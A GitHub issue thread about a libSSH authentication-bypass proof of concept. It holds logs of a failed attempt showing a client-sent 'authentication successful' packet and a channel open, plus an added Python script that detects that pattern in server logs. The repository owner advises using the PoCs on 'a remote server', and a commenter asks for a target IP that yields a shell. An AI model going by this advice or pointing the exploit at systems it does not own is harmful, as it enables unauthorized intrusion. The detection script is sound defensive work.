Questions about libSSH-Authentication-Bypass #7

Closed
thinkycx opened this issue Oct 18, 2018 · 4 comments

@thinkycx

commented Oct 18, 2018

Client side:

$ python libsshauthbypass.py  --host 172.17.0.4 -p22
/usr/local/lib/python2.7/dist-packages/paramiko/rsakey.py:130: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
  algorithm=hashes.SHA1(),

Server Side:

$ ./samplesshd-cb --dsakey /root/.ssh/id_dsa --rsakey /root/.ssh/id_rsa 0.0.0.0 -p 22 -v
[2018/10/18 07:34:58.992643, 3] ssh_socket_pollcallback:  Received POLLOUT in connecting state
[2018/10/18 07:34:58.992749, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:58.992958, 3] callback_receive_banner:  Received banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.992987, 1] ssh_server_connection_callback:  SSH client banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.993000, 1] ssh_analyze_banner:  Analyzing banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.993060, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:58.993074, 3] packet_send2:  packet: wrote [len=516,padding=10,comp=505,payload=505]
[2018/10/18 07:34:58.993779, 3] ssh_packet_socket_callback:  packet: read type 20 [len=596,padding=8,comp=587,payload=587]
[2018/10/18 07:34:58.993814, 3] ssh_packet_process:  Dispatching handler for packet type 20
[2018/10/18 07:34:58.993844, 3] crypt_set_algorithms_server:  Set output algorithm aes128-ctr
[2018/10/18 07:34:58.993853, 3] crypt_set_algorithms_server:  Set input algorithm aes128-ctr
[2018/10/18 07:34:58.993860, 3] crypt_set_algorithms_server:  Set HMAC output algorithm to hmac-sha2-256
[2018/10/18 07:34:58.993869, 3] crypt_set_algorithms_server:  Set HMAC input algorithm to hmac-sha2-256
[2018/10/18 07:34:59.045960, 3] ssh_packet_socket_callback:  packet: read type 30 [len=140,padding=5,comp=134,payload=134]
[2018/10/18 07:34:59.046017, 3] ssh_packet_process:  Dispatching handler for packet type 30
[2018/10/18 07:34:59.046029, 3] ssh_packet_kexdh_init:  Received SSH_MSG_KEXDH_INIT
[2018/10/18 07:34:59.048511, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.048553, 3] packet_send2:  packet: wrote [len=700,padding=8,comp=691,payload=691]
[2018/10/18 07:34:59.048597, 3] packet_send2:  packet: wrote [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.048605, 3] dh_handshake_server:  SSH_MSG_NEWKEYS sent
[2018/10/18 07:34:59.048664, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.089804, 3] ssh_packet_socket_callback:  packet: read type 21 [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.089866, 3] ssh_packet_process:  Dispatching handler for packet type 21
[2018/10/18 07:34:59.089880, 2] ssh_packet_newkeys:  Received SSH_MSG_NEWKEYS
[2018/10/18 07:34:59.089920, 3] ssh_handle_key_exchange:  ssh_handle_key_exchange: current state : 7
[2018/10/18 07:34:59.093583, 3] ssh_packet_socket_callback:  packet: read type 52 [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.093626, 3] ssh_packet_process:  Dispatching handler for packet type 52
[2018/10/18 07:34:59.093693, 3] ssh_packet_userauth_success:  Authentication successful
[2018/10/18 07:34:59.145509, 3] ssh_packet_socket_callback:  packet: read type 90 [len=44,padding=19,comp=24,payload=24]
[2018/10/18 07:34:59.145565, 3] ssh_packet_process:  Dispatching handler for packet type 90
[2018/10/18 07:34:59.145579, 3] ssh_packet_channel_open:  Clients wants to open a session channel
Allocated session channel
[2018/10/18 07:34:59.145602, 3] ssh_message_channel_request_open_reply_accept_channel:  Accepting a channel request_open for chan 0
[2018/10/18 07:34:59.145681, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.145709, 3] packet_send2:  packet: wrote [len=28,padding=10,comp=17,payload=17]
[2018/10/18 07:34:59.160915, 3] ssh_packet_socket_callback:  packet: read type 98 [len=28,padding=12,comp=15,payload=15]
[2018/10/18 07:34:59.160974, 3] ssh_packet_process:  Dispatching handler for packet type 98
[2018/10/18 07:34:59.160990, 3] ssh_message_handle_channel_request:  Received a shell channel_request for channel (43:0) (want_reply=1)
Allocated shell
[2018/10/18 07:34:59.161004, 3] ssh_message_channel_request_reply_success:  Sending a channel_request success to channel 0
[2018/10/18 07:34:59.161073, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.161101, 3] packet_send2:  packet: wrote [len=12,padding=6,comp=5,payload=5]
[2018/10/18 07:34:59.262384, 1] ssh_socket_exception_callback:  Socket exception callback: 1 (0)
[2018/10/18 07:34:59.262443, 1] ssh_socket_exception_callback:  Socket error: disconnected
Error : Socket error: disconnected

Do you know why it doesn't spawn a shell? Thank you.

@blacknbunny

Owner

commented Oct 18, 2018

Important: "People trying to reproduce libssh bug: the sample code (samplesshd-cb) is not vuln because it has explicit auth handlers. You can open a channel but nothing will happen."

As we can see, this section is just for opening a channel, but you cannot spawn a shell on a server that was started by "samplesshd-cb".

It's just for opening a channel. The PoCs that I wrote are just for remote hosts.

Like I wrote in README.MD. You can't use these PoCs on a local server. Find a remote server and then use it.
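A detection check over the server-side debug log format shown in this thread, as an added example that is not part of the original issue or the project's code: a server should never read SSH_MSG_USERAUTH_SUCCESS (type 52) from a client, so the script flags that packet and any channel open that arrives without a prior authentication request. The function name `analyze_server_log` and the benign sample are constructed for illustration.

```python
import re

# Line shape taken from the server log in this thread: [timestamp, level] function:  message
LINE_RE = re.compile(r"^\[(?P<ts>[^,\]]+), (?P<level>\d+)\] (?P<func>\w+):\s+(?P<msg>.*)$")
READ_RE = re.compile(r"packet: read type (\d+) ")

USERAUTH_REQUEST = 50  # RFC 4252, client -> server
USERAUTH_SUCCESS = 52  # RFC 4252, server -> client only
CHANNEL_OPEN = 90      # RFC 4254

def analyze_server_log(lines):
    """Return (timestamp, finding) tuples for one server-side session log."""
    findings, saw_auth_request = [], False
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unprefixed lines such as "Allocated session channel"
        r = READ_RE.search(m["msg"])
        if not r or m["func"] != "ssh_packet_socket_callback":
            continue  # only packets the server read from the client matter here
        ptype = int(r.group(1))
        if ptype == USERAUTH_REQUEST:
            saw_auth_request = True
        elif ptype == USERAUTH_SUCCESS:
            findings.append((m["ts"], "client sent SSH_MSG_USERAUTH_SUCCESS (type 52)"))
        elif ptype == CHANNEL_OPEN and not saw_auth_request:
            findings.append((m["ts"], "channel open without SSH_MSG_USERAUTH_REQUEST"))
    return findings

# Excerpt of lines copied from the server log posted in this thread.
THREAD_LOG = [
    "[2018/10/18 07:34:59.089804, 3] ssh_packet_socket_callback:  packet: read type 21 [len=12,padding=10,comp=1,payload=1]",
    "[2018/10/18 07:34:59.089880, 2] ssh_packet_newkeys:  Received SSH_MSG_NEWKEYS",
    "[2018/10/18 07:34:59.093583, 3] ssh_packet_socket_callback:  packet: read type 52 [len=12,padding=10,comp=1,payload=1]",
    "[2018/10/18 07:34:59.093693, 3] ssh_packet_userauth_success:  Authentication successful",
    "[2018/10/18 07:34:59.145509, 3] ssh_packet_socket_callback:  packet: read type 90 [len=44,padding=19,comp=24,payload=24]",
    "Allocated session channel",
]
# Constructed sample (not from the page): a session that authenticates before opening a channel.
BENIGN_LOG = [
    "[2018/10/18 08:00:00.000001, 3] ssh_packet_socket_callback:  packet: read type 21 [len=12,padding=10,comp=1,payload=1]",
    "[2018/10/18 08:00:00.000002, 3] ssh_packet_socket_callback:  packet: read type 50 [len=60,padding=7,comp=52,payload=52]",
    "[2018/10/18 08:00:00.000003, 3] ssh_packet_socket_callback:  packet: read type 90 [len=44,padding=19,comp=24,payload=24]",
]

if __name__ == "__main__":
    for ts, finding in analyze_server_log(THREAD_LOG):
        print(ts, finding)
```
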

@thinkycx

Author

commented Oct 18, 2018

Important: "People trying to reproduce libssh bug: the sample code (samplesshd-cb) is not vuln because it has explicit auth handlers. You can open a channel but nothing will happen."

As we can see, this section is just for opening a channel, but you cannot spawn a shell on a server that was started by "samplesshd-cb".

It's just for opening a channel. The PoCs that I wrote are just for remote hosts.

Like I wrote in README.MD. You can't use these PoCs on a local server. Find a remote server and then use it.

Thank you.

@blacknbunny

Owner

commented Oct 18, 2018

Thank you for reporting this issue.

@nx4dm1n

commented Oct 19, 2018

Important: "People trying to reproduce libssh bug: the sample code (samplesshd-cb) is not vuln because it has explicit auth handlers. You can open a channel but nothing will happen."
As we can see, this section is just for opening a channel, but you cannot spawn a shell on a server that was started by "samplesshd-cb".
It's just for opening a channel. The PoCs that I wrote are just for remote hosts.
Like I wrote in README.MD. You can't use these PoCs on a local server. Find a remote server and then use it.

Thank you.

Hi, I use these PoCs on a remote server, but it doesn't spawn a shell either. Can you give me a remote server IP which can spawn a shell? Thanks.
